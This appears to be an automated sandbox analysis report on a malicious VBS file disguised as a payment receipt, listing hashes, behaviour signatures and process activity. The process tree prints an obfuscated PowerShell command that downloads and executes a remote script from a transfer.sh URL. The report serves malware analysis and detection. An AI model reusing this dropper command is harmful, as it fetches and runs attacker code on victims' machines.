Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
28-11-2021 07:43
Static task
static1
Behavioral task
behavioral1
Sample
8vm39x_Payment_Receipt.vbs
Resource
win7-en-20211104
windows7_x64
0 signatures
0 seconds
General
-
Target
8vm39x_Payment_Receipt.vbs
-
Size
513B
-
MD5
45586ab9fada3f0335af9c963a4cc5d5
-
SHA1
5a342ed6755dc395215956143a54bcc4e42b97e7
-
SHA256
fb8c086de0ae136dd3cff31c3be2283d0de57d1eac3383616c02ba50aa02978e
-
SHA512
01ea352ada496a0d1426dd58f503771db1ea59f4b508157be3174174c99a74bb70288136a53b6051dc5dcd0e37c9525eec5f554e910b34cbcf3e63d42e26ff49
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://transfer.sh/get/8uvh1y/frt.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1476 powershell.exe 7 1476 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1476 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1324 wrote to memory of 1476 1324 WScript.exe powershell.exe PID 1324 wrote to memory of 1476 1324 WScript.exe powershell.exe PID 1324 wrote to memory of 1476 1324 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8vm39x_Payment_Receipt.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`eX((nE`w-OBje`cT ('{3}{1}{0}{2}' -f'ebCl','et.W','ient','N')).('{1}{0}{4}{3}{2}' -f 'nl','Dow','g','rin','oadSt').Invoke('https://transfer.sh/get/8uvh1y/frt.txt'))2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1324-55-0x000007FEFB7E1000-0x000007FEFB7E3000-memory.dmpFilesize
8KB
-
memory/1476-56-0x0000000000000000-mapping.dmp
-
memory/1476-58-0x000007FEF22B0000-0x000007FEF2E0D000-memory.dmpFilesize
11.4MB
-
memory/1476-59-0x0000000002630000-0x0000000002632000-memory.dmpFilesize
8KB
-
memory/1476-61-0x0000000002634000-0x0000000002637000-memory.dmpFilesize
12KB
-
memory/1476-60-0x0000000002632000-0x0000000002634000-memory.dmpFilesize
8KB
-
memory/1476-62-0x000000000263B000-0x000000000265A000-memory.dmpFilesize
124KB